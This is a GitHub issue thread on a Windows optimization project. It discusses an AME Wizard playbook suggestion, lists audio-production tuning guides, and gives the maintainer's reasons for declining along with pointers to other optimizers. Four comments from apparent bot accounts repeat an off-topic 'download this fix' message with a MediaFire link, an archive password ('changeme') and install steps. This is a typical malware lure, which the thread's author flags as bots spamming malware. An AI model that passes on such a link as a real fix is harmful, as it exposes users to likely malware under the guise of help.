### ISSUE TITLE
[SUGGESTION] AME Playbook

### ISSUE THREAD

**Issue by MarcoRavich** [ShivamXD6/Optimize-Windows#1]
Hi there, this project is really cool !

As many [Windows-customs](https://github.com/MarcoRavich/Opendows#open-source-customized-windows-isos) have already done, I strongly suggest to release an [Playbook](https://docs.ameliorated.io/playbooks.html) version trough [AME Wizard](https://ameliorated.io/) too.

Last but not least, consider that many people uses (or are forced to use) Windows for multimedia productions, but obtaining an optimized configuration is not for everyone.

It would be extremely useful (to push your work adoption/diffusion too) to have a dedicated/customized Windows for this purpose.

Some interesting resources about by audio manufacturers:
- PreSonus' [Optimizing Your Computer for Audio - Windows 10](https://support.presonus.com/hc/en-us/articles/360025279231-Optimizing-Your-Computer-for-Audio-Windows-10) guide;
- Focusrite's [Optimising Windows for Audio](https://support.focusrite.com/hc/en-gb/articles/207355205-Optimising-Windows-for-Audio) pages;
- Audinate's [How can I tune a Windows PC for best audio performance?](https://www.getdante.com/support/faq/how-can-i-tune-a-windows-pc-for-best-audio-performance) FAQ;

By Pete Brown (Microsoft dev):
- [Unofficial Windows 10 Audio Workstation build and tweak guide – Part 1](https://devblogs.microsoft.com/windows-music-dev/unofficial-windows-10-audio-workstation-build-and-tweak-guide-part-1/#comments);
- [Unofficial Windows 10 Audio Workstation build and tweak guide – Part 2](https://devblogs.microsoft.com/windows-music-dev/unofficial-windows-10-audio-workstation-build-and-tweak-guide-part-2/);

Other:
- [How to Optimize Windows 10 for Music Production](https://musicproductionnerds.com/how-to-optimize-windows-10-for-music-production) by MusicProductionNerds.com;
- [20 ways to optimize your Windows 10 PC for music production](https://bandzoogle.com/blog/20-ways-to-optimize-your-windows-10-pc-for-music-production) by Bandzoogle Blog;
- [AudiophileOptimizer Setup Guide](https://www.highend-audiopc.com/PDF/audiophile-optimizer-setup-guide.pdf) (PDF) by Highend-AudioPC

Hope that inspires !

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MarcoRavich** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
>
...filty bots are spamming malwares...

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ShivamXD6** [comment]
> As many [Windows-customs](https://github.com/MarcoRavich/Opendows#open-source-customized-windows-isos) have already done, I strongly suggest to release an [Playbook](https://docs.ameliorated.io/playbooks.html) version trough [AME Wizard](https://ameliorated.io/) too.

I cannot create PlayBooks due to following reasons :- 
1. AME Wizard is Partially Open Source.
2. There are already good and popular Playbooks like Revi or Atlas.
3. Many things which AME Wizard do can be done through normal `.cmd` scripts as well.

For a customised windows installation I will try to improve Post Installation scripts in Future.

> It would be extremely useful (to push your work adoption/diffusion too) to have a dedicated/customized Windows for this purpose.
> Some interesting resources about by audio manufacturers:

I will look into those resources thanks :)

**Comment by MarcoRavich** [comment]
Hi there, thanks for your reply.

I can understand your reasons - even if the 2nd point is not a reason to "avoid the competition" -  so I suggest you to check other open source optimuzers (such as @hellzerg's [Optimizer](https://github.com/hellzerg/optimizer#readme), @simeononsecurity's [Optimize, Harden, and Debloat Windows 10 and Windows 11 Deployments](https://github.com/simeononsecurity/Windows-Optimize-Harden-Debloat#readme), @DrEmpiricism's [Optimize-Offline](https://github.com/DrEmpiricism/Optimize-Offline#readme), @teeotsa's [Windows 11 Debloater](https://github.com/teeotsa/windows-11-debloat#readme)) and similar open projects.
Of course check out [mydigitallife](https://forums.mydigitallife.net/) or [MSFN](https://msfn.org/board/) as well as tools-collections like @nyxiereal's [XToolbox](https://github.com/nyxiereal/XToolbox#readme) for possible inspiration, collaborations and "hacks".

About the "multimedia-productions" optimizations: at the moment I don't know any script/playbook/optimizer specifically oriented to this purpose, even if the usersbase is potentially quite large.
However the most reasonable approach would seem to be the one implemented in the old/abandoned/archived [Switch performance mode script](https://github.com/helgoboss/switch-performance-mode#readme) by @helgoboss.

Last but not least, I find this attempt to integrate various audio-optimizations into a Playbook using ChatGPT quite interesting (even if formally not correct): https://chatgpt.com/share/11779cd4-d217-49d9-8a00-3ad72c1ecc6b

Hope that inspires.

**Comment by nyxiereal** [comment]
hello there

**Comment by ShivamXD6** [comment]
> Hi there, thanks for your reply.
> 
> I can understand your reasons - even if the 2nd point is not a reason to "avoid the competition" - so I suggest you to check other open source optimuzers (such as @hellzerg's [Optimizer](https://github.com/hellzerg/optimizer#readme), @simeononsecurity's [Optimize, Harden, and Debloat Windows 10 and Windows 11 Deployments](https://github.com/simeononsecurity/Windows-Optimize-Harden-Debloat#readme), @DrEmpiricism's [Optimize-Offline](https://github.com/DrEmpiricism/Optimize-Offline#readme), @teeotsa's [Windows 11 Debloater](https://github.com/teeotsa/windows-11-debloat#readme)) and similar open projects. Of course check out [mydigitallife](https://forums.mydigitallife.net/) or [MSFN](https://msfn.org/board/) as well as tools-collections like @nyxiereal's [XToolbox](https://github.com/nyxiereal/XToolbox#readme) for possible inspiration, collaborations and "hacks".
> 
> About the "multimedia-productions" optimizations: at the moment I don't know any script/playbook/optimizer specifically oriented to this purpose, even if the usersbase is potentially quite large. However the most reasonable approach would seem to be the one implemented in the old/abandoned/archived [Switch performance mode script](https://github.com/helgoboss/switch-performance-mode#readme) by @helgoboss.
> 
> Last but not least, I find this attempt to integrate various audio-optimizations into a Playbook using ChatGPT quite interesting (even if formally not correct): https://chatgpt.com/share/11779cd4-d217-49d9-8a00-3ad72c1ecc6b
> 
> Hope that inspires.

Sorry for late response, thanks for others open source optimization repos i'll look into it soon :)

Thank You bro for those resources it will really help me..

**Comment by ShivamXD6** [comment]
> hello there

Hello 👋

**Comment by MarcoRavich** [comment]
I would suggest you to check [Vitality](https://github.com/vojtikczhraje/Vitality#readme) by @vojtikczhraje, who has a similar approach to AME: https://github.com/vojtikczhraje/Vitality/issues/1#issuecomment-2314408761

Some kind of collaboration may benefit both.
